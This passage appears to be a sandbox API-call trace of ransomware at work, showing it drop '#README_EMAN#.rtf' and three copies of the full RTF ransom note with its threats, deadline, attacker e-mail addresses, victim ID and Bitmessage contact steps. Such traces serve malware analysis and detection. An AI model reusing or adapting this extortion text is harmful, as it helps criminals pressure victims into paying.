cchCount1=39, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 1 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\images\\cursors\\", cchCount1=54, lpString2="C:\\Program Files\\Java\\jre1.8.0_131\\lib\\security\\", cchCount2=48) returned 1 [0215.161] CompareStringW (Locale=0x400, dwCmpFlags=0x1, lpString1="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount1=71, lpString2="C:\\Program Files (x86)\\Google\\Chrome\\Application\\58.0.3029.110\\Locales\\", cchCount2=71) returned 2 [0215.161] GetFileAttributesW (lpFileName="C:\\Program Files (x86)\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\#readme_eman#.rtf")) returned 0xffffffff [0215.161] GetLastError () returned 0x2 [0215.161] CreateFileW (lpFileName="C:\\Program Files (x86)\\#README_EMAN#.rtf" (normalized: "c:\\program files (x86)\\#readme_eman#.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x0, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0x2f0 [0215.179] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0215.179] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x0, cbMultiByte=0, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr=0x0, lpUsedDefaultChar=0x0) returned 8717 [0215.179] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 nt\\f1\\lang1049\\'e5\\f0\\lang1033 ring n\\f1\\lang1049\\'e0\\f0\\lang1033 m\\f1\\lang1049\\'e5\\f0\\lang1033 \\f1\\lang1049\\'e5\\f0\\lang1033 m\\f1\\lang1049\\'e0\\f0\\lang1033", cchWideChar=8717, lpMultiByteStr=0x1eecea8, cbMultiByte=8717, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="{\\rtf1\\ansi\\ansicpg1251\\deff0\\nouicompat\\deflang1049{\\fonttbl{\\f0\\fnil\\fcharset0 Calibri;}{\\f1\\fnil\\fcharset204 Calibri;}}\r\n{\\colortbl ;\\red255\\green0\\blue0;\\red0\\green77\\blue187;\\red0\\green176\\blue80;\\red0\\green0\\blue255;\\red255\\green255\\blue255;}\r\n{\\*\\generator Riched20 10.0.15063}\\viewkind4\\uc1 \r\n\\pard\\ri-500\\sa200\\sl240\\slmult1\\qc\\tx8804\\ul\\b\\f0\\fs28\\lang1033 HOW TO RECOVER YOUR FILES INSTRUCTION\\ulnone\\f1\\lang1049\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf1\\f0\\fs24\\lang1033 ATENTION!!!\\par\r\n\\cf0\\b0 We are realy sorry to inform you that \\b ALL YOUR FILES WERE ENCRYPTED \\par\r\n\\b0 by our automatic software. It became possible because of bad server security. \\par\r\n\\cf1\\b ATENTION!!!\\par\r\n\\cf0\\b0 Please don't worry, we can help you to \\b RESTORE\\b0 your server to original\\par\r\nstate and decrypt all your files quickly and safely!\\par\r\n\\b\\par\r\n\\cf2 INFORMATION!!!\\par\r\n\\cf0\\b0 Files are not broken!!!\\par\r\nFiles were encrypted with AES-128+RSA-2048 crypto algorithms.\\par\r\nThere is no way to decrypt your files without unique decryption key and special software. Your unique decryption key is securely stored on our server. For our safety, all information about your server and your decryption key will be automaticaly \\b DELETED AFTER 7 DAYS! \\b0 You will irrevocably lose all your data!\\par\r\n\\i * Please note that all the attempts to recover your files by yourself or using third party tools will result only in irrevocable loss of your data!\\par\r\n* Please note that you can recover files only with your unique decryption key, which stored on our side. If you will use the help of third parties, you will only add a middleman.\\f1\\lang1049\\par\r\n\\i0\\f0\\lang1033\\par\r\n\\cf3\\b HOW TO RECOVER FILES???\\par\r\n\\cf0\\b0 Please write us to the e-mail \\i (write on English or use professional translator)\\i0 :\\par\r\n\r\n\\pard\\sl240\\slmult1\\b\\fs28 EncodeMan@qq.com\\par\r\nEncodeMan@protonmail.com\\par\r\nEncodeMan@tutanota.com\\cf1\\fs24\\par\r\nYou have to send your message on each of our 3 emails\\f1\\lang1049 \\f0\\lang1033 due to the fact that the message may not reach their intended recipient for a variety of reasons!\\fs28\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378\\cf0\\b0\\fs24 \\par\r\nIn subject line write your personal ID:\\par\r\n\\b\\fs28 460F9943EA70F103\\par\r\n\\b0\\fs24 We recommed you to attach 3 encrypted files to your message. We will demonstrate that we can recover your files. \\f1\\lang1049\\par\r\n\\i * \\f0\\lang1033 \\f1\\lang1049 \\f0\\lang1033 Please note that files must not contain any valuable information and their total size must be less than 5Mb. \\par\r\n\\i0\\par\r\n\\cf1\\b OUR ADVICE!!!\\par\r\n\\cf0\\b0 Please be sure that we will find common languge. We will restore all the data and give you recommedations how to configure the protection of your server.\\par\r\n\\ul\\b\\par\r\nWe will definitely reach an agreement ;) !!!\\b0\\par\r\n\\ulnone\\par\r\n\\fs20 \\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\qc\\tx8378\\b\\fs24 ALTERNATIVE COMMUNICATION\\par\r\n\\b0\\fs20\\par\r\n\r\n\\pard\\ri-74\\sl240\\slmult1\\tx8378 \\f1\\lang1049 If y\\'eeu did n\\'eet r\\'e5c\\'e5iv\\'e5 th\\'e5 \\'e0nsw\\'e5r fr\\'eem th\\'e5 \\'e0f\\'eer\\'e5cit\\'e5d \\'e5m\\'e0il\\f0\\lang1033 s\\f1\\lang1049 f\\'eer m\\'eer\\'e5 th\\f0\\lang1033 e\\f1\\lang1049 n \\f0\\lang1033 24\\f1\\lang1049 h\\f0\\lang1033 o\\f1\\lang1049 urs\\f0\\lang1033 please s\\f1\\lang1049\\'e5\\f0\\lang1033 nd us Bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 s fr\\f1\\lang1049\\'ee\\f0\\lang1033 m \\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r thr\\f1\\lang1049\\'ee\\f0\\lang1033 ugh th\\f1\\lang1049\\'e5\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 bp\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me }}{\\fldrslt{https://bitmsg.me\\ul0\\cf0}}}}\\f0\\fs20 . B\\f1\\lang1049\\'e5\\f0\\lang1033 l\\f1\\lang1049\\'ee\\f0\\lang1033 w is \\f1\\lang1049\\'e0\\f0\\lang1033 tut\\f1\\lang1049\\'ee\\f0\\lang1033 ri\\f1\\lang1049\\'e0\\f0\\lang1033 l \\f1\\lang1049\\'ee\\f0\\lang1033 n h\\f1\\lang1049\\'ee\\f0\\lang1033 w t\\f1\\lang1049\\'ee\\f0\\lang1033 s\\f1\\lang1049\\'e5\\f0\\lang1033 nd bitm\\f1\\lang1049\\'e5\\f0\\lang1033 ss\\f1\\lang1049\\'e0\\f0\\lang1033 g\\f1\\lang1049\\'e5\\f0\\lang1033 vi\\f1\\lang1049\\'e0\\f0\\lang1033 w\\f1\\lang1049\\'e5\\f0\\lang1033 b br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r:\\par\r\n1. \\f1\\lang1049\\'ce\\f0\\lang1033 p\\f1\\lang1049\\'e5\\f0\\lang1033 n in y\\f1\\lang1049\\'ee\\f0\\lang1033 ur br\\f1\\lang1049\\'ee\\f0\\lang1033 ws\\f1\\lang1049\\'e5\\f0\\lang1033 r th\\f1\\lang1049\\'e5\\f0\\lang1033 link {{\\field{\\*\\fldinst{HYPERLINK https://bitmsg.me/users/sign_up }}{\\fldrslt{https://bitmsg.me/users/sign_up\\ul0\\cf0}}}}\\f0\\fs20 \\f1\\lang1049\\'e0\\f0\\lang1033 nd m\\f1\\lang1049\\'e0\\f0\\lang1033 k\\f1\\lang1049\\'e5\\f0\\lang1033 th\\f1\\lang1049\\'e5\\f0\\lang1033 r\\f1\\lang1049\\'e5\\f0\\lang1033 gistr\\f1\\lang1049\\'e0\\f0\\lang1033 ti\\f1\\lang1049\\'ee\\f0\\lang1033 n b\\f1\\lang1049\\'f3\\f0\\lang1033 